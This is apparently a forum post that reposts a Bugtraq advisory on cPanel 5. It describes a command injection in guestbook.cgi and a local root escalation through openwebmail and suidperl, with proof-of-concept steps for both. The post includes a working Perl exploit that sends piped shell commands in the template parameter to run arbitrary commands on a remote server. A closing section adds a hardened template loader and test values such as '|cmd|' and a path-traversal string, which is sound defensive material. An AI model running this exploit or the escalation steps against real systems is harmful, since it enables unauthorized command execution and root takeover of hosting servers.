Cpanel 5 remote execution exploit ...

Here is a little piece of code I found on bugtraq; it is an apparent cpanel exploit ?!?

Disclaimer: I did not write this code, nor did I find this hole(?); however, I am posting it simply as a heads up. If you want to validate this on your own servers ... it's up to you.

#!/usr/bin/perl
#
# ------- start here -------
#
# Bug Found by: pokleyzz
#
# Cpanel is a web hosting control panel which allows clients to manage their web accounts through
# a web interface. Most of the applications are written in Perl and compiled to binary.
#
# Details
# =======
# There are multiple vulnerabilities in this package, as described below.
#
# 1) Remote command Execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
#
# There is a classic Perl open function vulnerability in the template variable which allows any
# user to read any file or run commands as the valid system user assigned to the specific URL
# in the Apache configuration.
#
# 2) Local privileges escalation (root)
#
# Cpanel comes with the openwebmail package as one of its web-based email readers, which is suid root.
# On a system with suid perl installed properly (with suid mode turned on), a local user may
# include their own Perl script when running the openwebmail script (oom) through suidperl.
#
# Openwebmail appends to the Perl include path (@INC) via the SCRIPT_FILENAME environment variable,
# then includes some files when executed.
#
# /usr/local/cpanel/base/openwebmail/oom line 14
#
# if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[\w\d\-]+\.pl! || $0 =~ m!^(.*?)/[\w\d\-]+\.pl! ) { $SCRIPT_DIR=$1; }
# if (!$SCRIPT_DIR) { print "Content-type: text/html\n\n\$SCRIPT_DIR not set in CGI script!\n"; exit 0; }
# push (@INC, $SCRIPT_DIR, ".");
# .
# .
# .
# require "openwebmail-shared.pl";
#
# proof of concept:
# i) Create a file openwebmail-shared.pl containing the Perl script you want to execute.
# ii) Set SCRIPT_FILENAME to point to the full path of the openwebmail-shared.pl file you just created.
# iii) exec the oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
#
# -------- cut here --------
#
# coded by cyzek. cyzek@efnet
# thanks for p0ng p0ng@brasnet.org

$url = $ARGV[0];
$cmd = $ARGV[1];

if(@ARGV != 2){
    print " jozc.pl - Cpanel 5 and below Remote Exploit by cyzek.\n";
    print " use %20 for spaces.\n";
    print " usage: $0 <host> <cmd>\n";
    exit;
}

use IO::Socket::INET;
$rem = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $url,
    PeerPort => "80");

if ($rem) {
    # The template parameter is passed straight into a two-argument open(),
    # so the pipe characters turn the value into a command to run.
    print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0 \n\r\n\r\n\r";
    @resp = <$rem>;
}
print "@resp\n\n";
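As an added example (not part of the posted exploit and not cPanel's own code), this is the hardened form of a template loader like the one the advisory above describes: the original relied on the two-argument open(), which treats a value wrapped in pipe characters as a command rather than a filename. The template directory, the .tmpl naming rule and the sample template are assumptions made for the example.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Assumed location templates may be loaded from (a temp dir so the script runs stand-alone).
my $TEMPLATE_DIR = tempdir(CLEANUP => 1);

# Hardened loader. The vulnerable form was open(FH, $template): with two arguments,
# Perl interprets leading/trailing "|" as "run this as a command". Three-argument
# open with an explicit "<" mode only ever opens a file, and the whitelist below
# rejects pipes, slashes and ".." before the name reaches the filesystem at all.
sub load_template {
    my ($name) = @_;
    # Only a plain identifier ending in .tmpl is accepted (assumed naming rule).
    return (undef, "invalid template name")
        unless $name =~ /\A([A-Za-z0-9_-]{1,64})\.tmpl\z/;
    my $path = File::Spec->catfile($TEMPLATE_DIR, $1 . '.tmpl');
    open(my $fh, '<', $path) or return (undef, "cannot open template: $!");
    local $/;                      # slurp the whole file
    my $body = <$fh>;
    close $fh;
    return ($body, undef);
}

# Constructed sample template so the loader has something legitimate to read.
open(my $out, '>', File::Spec->catfile($TEMPLATE_DIR, 'default.tmpl')) or die $!;
print $out "Hello from the guestbook template\n";
close $out;

# The second and later candidates mirror the kind of value the exploit sends;
# each one is rejected by the whitelist and never reaches open().
for my $candidate ('default.tmpl', '|cmd|', '../../etc/passwd', 'default.tmpl|') {
    my ($body, $err) = load_template($candidate);
    printf "%-20s => %s\n", $candidate,
        defined $body ? "loaded (" . length($body) . " bytes)" : "rejected: $err";
}
```

Running the script under `perl -T` additionally taints anything taken from CGI parameters, so an unvalidated template name would die before reaching open() even if the regex were forgotten.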
